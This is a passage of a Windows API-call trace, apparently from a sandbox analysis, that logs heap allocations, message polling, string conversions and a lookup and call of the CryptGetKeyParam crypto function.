[0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0088.010] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0088.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0088.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0088.011] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0088.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0088.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0088.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0088.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0088.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0088.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0088.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0088.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0088.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0088.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0088.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0088.012] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0088.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0088.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0088.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0088.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0088.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0088.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0088.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0088.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0088.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0088.012] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0088.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0088.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0088.012] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0088.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0088.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0088.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0088.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0088.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0088.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0088.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0088.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0088.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0088.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0088.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0088.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0088.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0088.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0088.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0088.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0088.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0088.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0088.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0088.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0088.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0088.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0088.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0088.015] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0088.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0088.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0088.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0088.016] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0088.016] CryptGetKeyParam (in: hKey=0x41ac6c0, dwParam=0x7, pbData=0x43e26f0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e26f0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0088.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0088.018] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0088.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.019] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0088.019] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, 